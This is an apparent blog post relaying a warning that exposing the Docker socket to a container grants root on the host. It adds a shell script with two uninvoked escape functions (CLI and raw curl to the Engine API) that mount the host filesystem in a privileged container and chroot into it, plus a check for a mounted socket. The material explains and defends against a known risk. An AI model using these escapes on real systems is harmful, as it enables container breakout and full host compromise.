A cryptographer at Rackspace recently blogged a warning to all Docker users: don't expose the Docker socket, even if it's only to a container.
He writes that many developers believe that getting write access to the Docker socket from inside a container doesn't effectively give you root (it does), or that it keeps your access limited to that container with no way to break out (you can break out).
Write access to the Docker socket is root on the host, regardless of where the write comes from. This is different from Jérôme Petazzoni's
dind, which gives you Docker-in-Docker; here we're talking about access to the host's Docker socket.
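The escape the post describes, plus a check for the condition it warns about, as an added example that is not code from the original post or from the Rackspace write-up. It assumes the default socket path /var/run/docker.sock (overridable via the DOCKER_SOCK variable, an assumption of this script), and the image name "alpine" and the file name /tmp/owned are placeholders chosen for illustration:

```shell
#!/bin/sh
# Added example (not from the original post). Part 1 shows why write access
# to the host's Docker socket is root on the host; part 2 is a check for a
# socket bind-mounted into the current mount namespace.
# Assumption: default socket path, overridable through DOCKER_SOCK.
SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"

# Part 1. The pattern the post warns about is handing a container the host
# socket, e.g.:
#     docker run -v /var/run/docker.sock:/var/run/docker.sock myimage
# Inside such a container no kernel bug is needed: the daemon will create a
# privileged container with the host root filesystem bind-mounted, and a
# chroot into it is a root shell on the host. With a docker CLI present:
escape_with_cli() {
    docker -H "unix://$SOCK" run --rm -it --privileged -v /:/host alpine \
        chroot /host /bin/sh
}

# The same thing with nothing but curl, to make the point that it is the
# socket, not the CLI, that grants the access. The two requests are the
# Engine API's POST /containers/create and POST /containers/{id}/start.
# The placeholder command writes /tmp/owned on the HOST as uid 0.
escape_with_curl() {
    id=$(curl -s --unix-socket "$SOCK" -X POST \
        -H 'Content-Type: application/json' \
        -d '{"Image":"alpine","Cmd":["chroot","/host","sh","-c","id > /tmp/owned"],"HostConfig":{"Privileged":true,"Binds":["/:/host"]}}' \
        http://localhost/containers/create | sed 's/.*"Id":"\([0-9a-f]*\)".*/\1/')
    curl -s --unix-socket "$SOCK" -X POST "http://localhost/containers/$id/start"
}

# Part 2. Check from inside a container: is the Docker socket mounted here?
# Reads mount entries in /proc/self/mounts format ("source target fstype
# options dump pass") from stdin; succeeds (exit 0) if any mount target is
# a docker.sock, fails (exit 1) otherwise.
has_docker_socket() {
    awk '$2 ~ /\/docker\.sock$/ { found = 1 } END { exit !found }'
}

# Host-side version of the same check: list running containers that have
# the socket bound in. Only meaningful where a docker CLI and daemon exist.
containers_with_socket() {
    docker ps -q | while read -r c; do
        docker inspect --format '{{.Name}} {{range .Mounts}}{{.Source}} {{end}}' "$c"
    done | grep 'docker\.sock' || true
}

# Constructed sample mount table (not captured from a real host), showing
# the socket bind-mounted in the way the post warns about.
SAMPLE_MOUNTS='overlay / overlay rw,relatime 0 0
/dev/sda1 /etc/hosts ext4 rw,relatime 0 0
/dev/sda1 /run/docker.sock ext4 rw,relatime 0 0'

# Stand-alone run: audit the real mount table when available.
if [ -r /proc/self/mounts ]; then
    if has_docker_socket < /proc/self/mounts; then
        echo "WARNING: Docker socket is mounted here; that is root on the host"
    else
        echo "no Docker socket in this mount namespace"
    fi
fi
```

Neither escape function is invoked when the script runs; they are there to be read, or to be called deliberately inside a container you own. Note that the socket's host path can differ from the path it is mounted at inside the container (the sample uses /run/docker.sock), so the check matches on the mount target's basename rather than on a fixed path.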
He even made a video to demonstrate the flaw in one developer's setup: